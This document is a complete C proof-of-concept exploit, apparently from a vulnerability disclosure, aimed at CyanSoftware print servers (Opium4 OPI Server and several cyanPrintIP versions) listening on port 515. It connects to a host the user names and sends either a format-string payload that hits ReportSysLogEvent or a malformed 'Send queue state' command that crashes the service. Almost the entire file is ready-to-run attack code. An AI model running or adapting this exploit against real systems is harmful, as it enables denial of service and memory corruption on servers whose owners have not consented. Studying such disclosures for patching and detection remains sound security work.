/*
  by Luigi Auriemma
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        515



int putss(u8 *data, u8 *str);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            attack;
    u16     port    = PORT;
    u8      buff[1024],
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Format string and crash in CyanSoftware print servers "VER"\n"
        "  Opium4 OPI Server <= 4.10.1028\n"
        "  cyanPrintIP Easy OPI <= 4.10.1030\n"
        "  cyanPrintIP Professional <= 4.10.1030\n"
        "  cyanPrintIP Workstation <= 4.10.836\n"
        "  cyanPrintIP Standard <= 4.10.940\n"
        "  cyanPrintIP Basic <= 4.10.1030\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host>\n"
            "\n"
            "Attacks:\n"
            " 1 = format string in ReportSysLogEvent\n"
            " 2 = service crash through \"Send queue state\" commands\n"
            "\n", argv[0]);
        exit(1);
    }

    attack = atoi(argv[1]);

    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in))
     < 0) std_err();

    p = buff;
    if(attack == 1) {
        printf("- format string in ReportSysLogEvent\n");
        *p++ = 2;
        p += putss(p, "%n%n%n%s%s%s%n%n%n%s\n");

    } else if(attack == 2) {
        printf("- service crash through \"Send queue state\" commands\n");
        *p++ = 3;   // 3 or 4
        p += putss(p, "queue 123 job\n");

    } else {
        printf("\nError: wrong attack number\n");
        exit(1);
    }

    printf("- send malformed data\n");
    send(sd, buff, p - buff, 0);
    if(!timeout(sd, 5)) recv(sd, buff, sizeof(buff), 0);

    printf("- done\n");
    close(sd);
    return(0);
}



int putss(u8 *data, u8 *str) {
    int     len;

    len = strlen(str);
    memcpy(data, str, len);
    return(len);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


